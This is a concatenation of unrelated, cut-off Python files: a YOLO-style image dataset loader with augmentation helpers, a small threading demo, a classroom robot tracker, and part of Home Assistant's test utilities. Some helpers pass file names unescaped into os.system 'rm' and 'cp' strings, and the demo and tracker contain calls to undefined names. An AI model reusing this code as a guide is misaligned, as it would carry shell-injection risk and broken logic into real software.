b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Caching labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
s, nf, nm, ne, nd, n)
assert nf > 0, 'No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
if not labels_loaded:
print('Saving labels to %s for faster future loading' % np_labels_path)
np.save(np_labels_path, self.labels) # save for next time
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
if cache_images: # if training
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r < 1 or (self.augment and r != 1): # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
xc, yc = [int(random.uniform(s * 0.5, s * 1.5)) for _ in range(2)] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
border=-s // 2) # border to remove
return img4, labels4
def letterbox(img, new_shape=(416, 416), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = new_shape
ratio = new_shape[0] / shape[1], new_shape[1] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=0):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
# targets = [cls, xyxy]
height = img.shape[0] + border * 2
width = img.shape[1] + border * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[0] + border # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[1] + border # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
if (border != 0) or (M != np.eye(3)).any(): # image changed
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 4) & (h > 4) & (area / (area0 * s + 1e-16) > 0.2) & (ar < 10)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='../data/sm4/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ['../data/sm4/images', '../data/sm4/background']:
create_folder(path + 'bmp')
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
with open(file, 'r') as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace('/images', '/imagesbmp')
lines = lines.replace('/background', '/backgroundbmp')
for ext in formats:
lines = lines.replace(ext, '.bmp')
with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='data/coco_64img.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
37-3.py
|
# encoding=utf-8
import select
from threading import Thread
from time import time
def slow_system_call():
select.select([],[],[],0.1)
start = time()
threads = []
for _ in range(5):
thread = Thread(target=slow_system_call)
thread.start()
threads.append(thread)
end = time()
def compute_helicopter_location():
pass
for i in range(5):
compute_helicopter_location(i)
for thread in threads:
thread.join()
print('Took %.3f seconds' %(end-start))
|
RobotTracker.py
|
# -*- coding: utf-8 -*-
from teachablerobots.src.Communicate import SocketComm
from teachablerobots.src.GridSpace import *
import math
from time import sleep
#import threading
import ast
from multiprocessing import Process, Queue, Event, Value, Lock, Manager
from ctypes import c_char_p
class Robot(object):
'''
Attributes:
lowColor: The minimum HSV value of the robot to track
highColor: The maximum HSV value of the robot to track
robot: An (x, y, w, h) tuple that describes the robots location
and dimensions
contour: The contour of the robot
ellipse: an ((x,y),(w,l), a) tuple where (x,y) is the center,
(w,l) is the width and length, and a is the angle of rotation.
Used to track the robots angle.
heading: The robots relative angle
dir: the direction the robot is moving, "fwd", "bk"
Functions:
SetGoal(self, goal)
Run(self)
FindRobot(self, frame)
FrameOverlay(self, frame)
LocationToCoordinates(self, location)
CoordinatesToLocation(self, coordinates)
GetHeading(self, frame)
DrawGoal(self, goal)
DrawLine(self, point1, point2)
def DrawPolygon(self, startPoint, sideLength, numberOfSides)
'''
def __init__(self, gridSpace, color):
if(color == "green"):
self.low = (48, 52, 149)
self.high = (89, 325, 340)
if(color == "pink"):
self.low = (56, 82, 170)
self.high = (180,271,258)
if(color == "blue"):
self.low = (55,132,142)
self.high = (114,273,273)
self.robot = ((0,0),(0,0), 0)
self.contour = []
self.heading = 0
self.dir = "fwd"
self.rLoc = (0,0)
self.goal = (0,0)
self.goalFound = False
self.displayGoals = False
self.displayGoalLoc = False
self._finished = False
self.mazeFinished = False
self.gs = gridSpace
self.m = Manager()
self.lock = Lock()
self.location = self.m.Value(c_char_p, b"(4,1)")
self.direction = self.m.Value(c_char_p, b"Up")
self.range = self.m.Value("i", 0)
self.distanceTravelled = self.m.Value('i', 0)
self.robotServer = SocketComm(5580)
self.robotComm = Process(target=self.GetRobotResponse, args=(self.location,self.direction,self.distanceTravelled,self.range,))
self.robotComm.e = Event()
#self.robotComm.daemon = True
def GetRobotResponse(self, loc, _dir, dist, r):
d = dict()
while(not self.robotServer.finished.value):
#print("size of inbox: " + str(self.robotServer.inbox.qsize()))
if(not self.robotServer.inbox.empty()):
temp = ast.literal_eval(self.robotServer.inbox.get())
try:
if("location" in temp):
self.lock.acquire()
loc.value = temp["location"].rstrip().encode('ascii')
self.lock.release()
dist.value = dist.value + 1
#print("distance travelled: " + str(dist.value))
#print("location: " + loc.value.decode('ascii'))
elif("direction" in temp):
self.lock.acquire()
_dir.value = temp["direction"].rstrip().encode('ascii')
self.lock.release()
#print("direction: " + _dir.value.decode('ascii'))
elif("range" in temp):
self.lock.acquire()
r.value = temp["range"]
print("range: " + str(temp["range"]))
self.lock.release()
else:
print("unknown: " + str(temp))
finally:
pass
return
def SendCommandSequence(self, seq):
if(len(seq) == 1 and seq == "0"):
self.robotServer.sendMessage("0")
return
else:
d = dict()
d["sequence"] = seq
self.robotServer.sendMessage(str(d))
return
def SendObjective(self, objective):
d = dict()
d["objective"] = objective
self.robotServer.sendMessage(str(d)) # i.e. objective is to drive to first quadrant
print("sent: " + objective)
return
def SetGoal(self, goal):
self.goal = goal
return
def Run(self):
c = 0
i = 0
if(self.robotServer.connected):
self.robotCommThread.start()
print("starting comm thread")
print("starting...")
while(not self._finished):
#print("length of inbox in loop: " + str(len(self.robotServer.inbox)))
self.gs.Update(self.FrameOverlay)
#self.FindRobot()
#self.gs.ShowFrame(title=self.gs.title)
key = cv2.waitKey(1) & 0xFF
if(key == ord("q")):
self.finished = True
elif(key == ord("c")):
cv2.imwrite("picture%i.jpg" %i, window)
i += 1
self.robotServer.e.set()
self.robotServer.finished.value = True
print("closing connection")
self.robotServer.closeConnection()
def FindRobot(self):
contours = cv2.findContours(self.gs.processedFrame, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]
if(len(contours) > 0):
cont = max(contours, key=cv2.contourArea)
if(cv2.contourArea(cont) > 200 and cv2.contourArea(cont) < 700):
temp = cv2.minAreaRect(cont)
if(abs(temp[0][0] - self.robot[0][0]) > .02 and abs(temp[0][1] - self.robot[0][1]) > .02):
self.contour = cont
self.robot = temp
return
def FrameOverlay(self): #TODO draw point, student name in text area
if(self.displayGoals):
self.DrawGoal(self.LocToCoord(self.goal), self.displayGoalLoc)
if(len(self.contour) > 0):
box = cv2.boxPoints(self.robot)
box = np.int0(box)
cv2.drawContours(self.gs.frame, [box], 0, (0, 255, 0), 2)
(x,y) = self.LocToCoord(self.robot[0])
if(not self.mazeFinished and abs(5-x) < .5 and abs(0-y) < .5):
self.goalFound = True
cv2.putText(self.gs.frameCopy, "Good Job!", (100, 240), 2, 1, (0, 255, 0), 3)
return self.gs.frame
def LocToCoord(self, location):
return (location[0] - self.gs.frameCenter[0]) / 38, (self.gs.frameCenter[1] - location[1]) / 38
def CoordToLoc(self, coordinates):
return (int(coordinates[0] *38 + self.gs.frameCenter[0])), (int(-coordinates[1]*38 + self.gs.frameCenter[1]))
def DrawGoal(self, goal, showXY):
cv2.circle(self.frame,(goal[0], goal[1]), 2, (220,80,80), 2)
cv2.circle(self.frame,(goal[0], goal[1]), 7, (220,80,80), 2)
cv2.circle(self.frame,(goal[0], goal[1]), 12, (220,80,80), 2)
if(showXY):
cv2.putText(self.frame, str(self.CoordToLoc(goal)), (goal[0]+10, goal[1]+10), cv2.FONT_HERSHEY_PLAIN, .95, (50,100,200), 2)
def DrawLine(self, point1, point2):
cv2.line(self.frame, point1, point2, (255,50,155), 4)
pass
def DrawPolygon(self, startPoint, sideLength, numberOfSides):
pass
def GetHeading(self, frame):
pass
#r = Robot(GridSpace(mode=""), "green")
#r.Run()
|
common.py
|
"""Test the helper method for writing tests."""
from __future__ import annotations
import asyncio
import collections
from collections import OrderedDict
from collections.abc import Awaitable, Collection
from contextlib import contextmanager
from datetime import datetime, timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import pathlib
import threading
import time
from time import monotonic
import types
from typing import Any
from unittest.mock import AsyncMock, Mock, patch
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa: F401
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import device_automation, recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
)
from homeassistant.components.mqtt.models import ReceiveMessage
from homeassistant.config import async_process_component_config
from homeassistant.const import (
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import BLOCK_LOG_TIMEOUT, HomeAssistant
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.uuid as uuid_util
import homeassistant.util.yaml.loader as yaml_loader
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
async def async_get_device_automations(
hass: HomeAssistant,
automation_type: device_automation.DeviceAutomationType,
device_id: str,
) -> Any:
"""Get a device automation for a single device id."""
automations = await device_automation.async_get_device_automations(
hass, automation_type, [device_id]
)
return automations.get(device_id)
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)
).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return asyncio.run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop
).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), "testing_config", *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
hass = loop.run_until_complete(async_test_home_assistant(loop))
loop_stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
loop_stop_event.set()
orig_stop = hass.stop
hass._stopped = Mock(set=loop.stop)
def start_hass(*mocks):
"""Start hass."""
asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
loop_stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop, load_registries=True):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock) and not isinstance(target, AsyncMock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock):
fut = asyncio.Future()
fut.set_result(None)
return fut
return orig_async_create_task(coroutine)
async def async_wait_for_task_count(self, max_remaining_tasks: int = 0) -> None:
"""Block until at most max_remaining_tasks remain.
Based on HomeAssistant.async_block_till_done
"""
# To flush out any call_soon_threadsafe
await asyncio.sleep(0)
start_time: float | None = None
while len(self._pending_tasks) > max_remaining_tasks:
pending: Collection[Awaitable[Any]] = [
task for task in self._pending_tasks if not task.done()
]
self._pending_tasks.clear()
if len(pending) > max_remaining_tasks:
remaining_pending = await self._await_count_and_log_pending(
pending, max_remaining_tasks=max_remaining_tasks
)
self._pending_tasks.extend(remaining_pending)
if start_time is None:
# Avoid calling monotonic() until we know
# we may need to start logging blocked tasks.
start_time = 0
elif start_time == 0:
# If we have waited twice then we set the start
# time
start_time = monotonic()
elif monotonic() - start_time > BLOCK_LOG_TIMEOUT:
# We have waited at least three loops and new tasks
# continue to block. At this point we start
# logging all waiting tasks.
for task in pending:
_LOGGER.debug("Waiting for task: %s", task)
else:
self._pending_tasks.extend(pending)
await asyncio.sleep(0)
async def _await_count_and_log_pending(
self, pending: Collection[Awaitable[Any]], max_remaining_tasks: int = 0
) -> Collection[Awaitable[Any]]:
"""Block at most max_remaining_tasks remain and log tasks that take a long time.
Based on HomeAssistant._await_and_log_pending
"""
wait_time = 0
return_when = asyncio.ALL_COMPLETED
if max_remaining_tasks:
return_when = asyncio.FIRST_COMPLETED
while len(pending) > max_remaining_tasks:
_, pending = await asyncio.wait(
pending, timeout=BLOCK_LOG_TIMEOUT, return_when=return_when
)
if not pending or max_remaining_tasks:
return pending
wait_time += BLOCK_LOG_TIMEOUT
for task in pending:
_LOGGER.debug("Waited %s seconds for task: %s", wait_time, task)
return []
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.async_wait_for_task_count = types.MethodType(async_wait_for_task_count, hass)
hass._await_count_and_log_pending = types.MethodType(
_await_count_and_log_pending, hass
)
hass.data[loader.DATA_CUSTOM_COMPONENTS] = {}
hass.config.location_name = "test home"
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = "US/Pacific"
hass.config.units = METRIC_SYSTEM
hass.config.media_dirs = {"local": get_test_config_dir("media")}
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(
hass,
{
"_": "Not empty or else some bad checks for hass config in discovery.py breaks"
},
)
hass.config_entries._entries = {}
hass.config_entries._store._async_ensure_stop_listener = lambda: None
# Load the registries
if load_registries:
await asyncio.gather(
device_registry.async_load(hass),
entity_registry.async_load(hass),
area_registry.async_load(hass),
)
await hass.async_block_till_done()
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch("homeassistant.core._async_create_timer"), patch.object(
hass, "async_stop_track_tasks"
):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
